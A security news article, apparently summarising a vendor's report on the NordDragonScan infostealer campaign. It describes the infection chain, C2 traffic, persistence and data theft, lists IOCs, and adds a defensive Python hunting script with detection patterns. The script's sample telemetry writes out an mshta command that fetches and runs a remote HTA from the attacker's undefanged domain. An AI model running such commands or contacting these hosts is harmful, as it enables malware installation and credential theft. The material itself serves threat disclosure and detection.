NordDragonScan Targets Windows Users to Steal Login Credentials
FortiGuard Labs has identified an active campaign that targets Microsoft Windows users with the NordDragonScan infostealer.
Rated high severity, the threat uses a multi-stage infection chain to gain a foothold, harvest sensitive data, and exfiltrate it to a command-and-control (C2) server, where it can be reused in follow-on attacks.
As detailed in the 2025 Global Threat Landscape Report, the malware's tradecraft warrants prompt attention from Windows users and organizations alike.
New Infostealer Exploits Windows Systems
The attack begins with a deceptive initial vector, utilizing shortened URLs like “hxxps://cutt[.]ly/4rnmskDe” that redirect to “hxxps://secfileshare[.]com.”
This prompts the download of a malicious RAR archive with a Ukrainian-themed filename, which contains a harmful LNK shortcut.
Upon execution, this shortcut invokes mshta.exe to run a weaponized HTA script named “1.hta” from the same server.
The HTA script masquerades as a legitimate process by copying PowerShell.exe to a disguised path and distracts users with a benign decoy document in Ukrainian, while silently deploying the core payload, “adblocker.exe,” into the victim’s temporary directory.
Pairing several different decoy documents with the same executable lets the attackers tailor the lure to different targets while reusing one payload, and underlines the effort invested in evading detection and maximizing infection rates.
Once installed, NordDragonScan, a .NET executable whose embedded PDB path points to "C:\Users\NordDragon\Documents\visual studio" (a leftover build artifact that names the developer's project folder), hides its hardcoded strings from static analysis with a custom obfuscation scheme based on XOR operations and byte-swapping.
Sophisticated Tactics
It creates a working directory named "NordDragonScan" under the user's local app data folder to stage stolen information before upload.
The malware communicates with its C2 server, "kpuszkiev[.]com", using custom HTTP headers; it sends the victim's MAC address to confirm connectivity and retrieves dynamic URLs to which the stolen data is later exfiltrated.
Persistence is established through a registry value named "NordStar" under Windows' "CurrentVersion\Run" key, so the malware is relaunched at each logon and survives reboots.

NordDragonScan's reconnaissance capabilities are extensive. It collects system information through WMI and .NET calls, including the computer name, OS version, and hardware specifications.
It also enumerates network adapters and probes other IP addresses in the same subnet to map the local network.
Beyond system data, it steals files with specific extensions like .docx, .pdf, and .txt from Desktop, Documents, and Downloads folders, alongside entire Chrome and Firefox profiles containing login credentials.
Screenshots are taken and saved as “SPicture.png,” adding to the trove of sensitive data bundled and uploaded to the C2 server with custom headers indicating the type of information being exfiltrated.
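The behaviours described above (mshta.exe loading a remote HTA, PowerShell copied out of its normal location, adblocker.exe launched from the temp directory, the "NordStar" Run value, the NordDragonScan staging directory and SPicture.png, and connections to the two listed domains) map onto events that Sysmon or an EDR records. The following hunting script is an added example, not FortiGuard's tooling or anything from the report: the simplified event schema and field names are assumed, the sample events are constructed, and the renamed PowerShell path in the sample is invented for illustration because the article does not name the disguised path.

```python
"""Hunt for NordDragonScan behaviours in Sysmon-style process, network,
file and registry events. Added example; event schema is assumed
(event_id 1 = process create, 3 = network connect, 11 = file create,
13 = registry value set) and the sample events are constructed."""
import re

# Indicators from the article's IOC table (undefanged, as they appear in logs).
C2_DOMAINS = {"secfileshare.com", "kpuszkiev.com"}
PAYLOAD_SHA256 = {"f4f6beea11f21a053d27d719dab711a482ba0e2e42d160cefdbdad7a958b93d0"}

# Legitimate on-disk locations of PowerShell. The HTA stage copies
# PowerShell.exe elsewhere, so a PowerShell binary (by OriginalFileName)
# running from any other path is suspicious.
LEGIT_POWERSHELL = re.compile(
    r"^c:\\windows\\(system32|syswow64)\\windowspowershell\\v1\.0\\powershell\.exe$", re.I)


def check_event(ev):
    """Return the list of findings (strings) for one event dict; empty if clean."""
    hits = []
    eid = ev.get("event_id")
    if eid == 1:  # process creation
        image = ev.get("image", "")
        cmd = ev.get("command_line", "")
        if image.lower().endswith("\\mshta.exe") and re.search(r"https?://\S+\.hta\b", cmd, re.I):
            hits.append("mshta.exe executing remote HTA")
        if ev.get("original_file_name", "").lower() == "powershell.exe" and not LEGIT_POWERSHELL.match(image):
            hits.append("PowerShell running from non-standard path: " + image)
        if re.search(r"\\temp\\adblocker\.exe$", image, re.I):
            hits.append("adblocker.exe launched from a temp directory")
        if ev.get("sha256", "").lower() in PAYLOAD_SHA256:
            hits.append("image hash matches NordDragonScan IOC")
    elif eid == 3:  # network connection
        host = ev.get("dest_hostname", "").lower().rstrip(".")
        if host in C2_DOMAINS:
            hits.append("connection to known distribution/C2 domain: " + host)
    elif eid == 11:  # file create
        target = ev.get("target_filename", "")
        if re.search(r"\\NordDragonScan\\", target, re.I):
            hits.append("write into NordDragonScan staging directory")
        if target.lower().endswith("\\spicture.png"):
            hits.append("screenshot artifact SPicture.png written")
    elif eid == 13:  # registry value set
        if re.search(r"\\CurrentVersion\\Run\\NordStar$", ev.get("target_object", ""), re.I):
            hits.append("Run-key persistence value 'NordStar' set")
    return hits


def hunt(events):
    """Map the index of each flagged event to its findings; clean events are omitted."""
    findings = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample telemetry: one benign process, then the chain from the article.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE", "command_line": "powershell.exe -File backup.ps1"},
    {"event_id": 1, "image": r"C:\Windows\System32\mshta.exe", "original_file_name": "MSHTA.EXE",
     "command_line": "mshta.exe https://secfileshare.com/1.hta"},
    # Hypothetical disguised copy of PowerShell (the report excerpt does not name the path).
    {"event_id": 1, "image": r"C:\Users\victim\AppData\Local\Temp\svc.exe",
     "original_file_name": "PowerShell.EXE", "command_line": "svc.exe -w hidden -c ..."},
    {"event_id": 1, "image": r"C:\Users\victim\AppData\Local\Temp\adblocker.exe",
     "original_file_name": "adblocker.exe", "command_line": "adblocker.exe",
     "sha256": "f4f6beea11f21a053d27d719dab711a482ba0e2e42d160cefdbdad7a958b93d0"},
    {"event_id": 13, "target_object":
     r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\NordStar"},
    {"event_id": 3, "dest_hostname": "kpuszkiev.com", "dest_port": 443},
    {"event_id": 11, "target_filename": r"C:\Users\victim\AppData\Local\NordDragonScan\SPicture.png"},
    {"event_id": 11, "target_filename": r"C:\Users\victim\Documents\report.docx"},
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The PowerShell check keys on OriginalFileName (a PE version-resource field Sysmon records) rather than on the on-disk name, which is exactly the attribute a renamed copy cannot easily hide; the path regexes are deliberately narrow to the artefacts the report names, so tune them to your own telemetry field names before deploying.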
Fortinet states that its protections, including FortiGuard Antivirus and Content Disarm and Reconstruction services, block this threat across FortiGate, FortiMail, FortiClient, and FortiEDR.
Users are urged to treat LNK shortcuts and compressed archives from untrusted sources with caution, since the campaign's delivery chain of shortened URL, file-sharing site and RAR archive is still active.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| Domain | secfileshare[.]com, kpuszkiev[.]com |
| RAR (SHA256) | 2102c2178000f8c63d01fd9199400885d1449501337c4f9f51b7e444aa6fbf50, … |
| HTA (SHA256) | f8403e30dd495561dc0674a3b1aedaea5d6839808428069d98e30e19bd6dc045, … |
| Executable (SHA256) | f4f6beea11f21a053d27d719dab711a482ba0e2e42d160cefdbdad7a958b93d0 |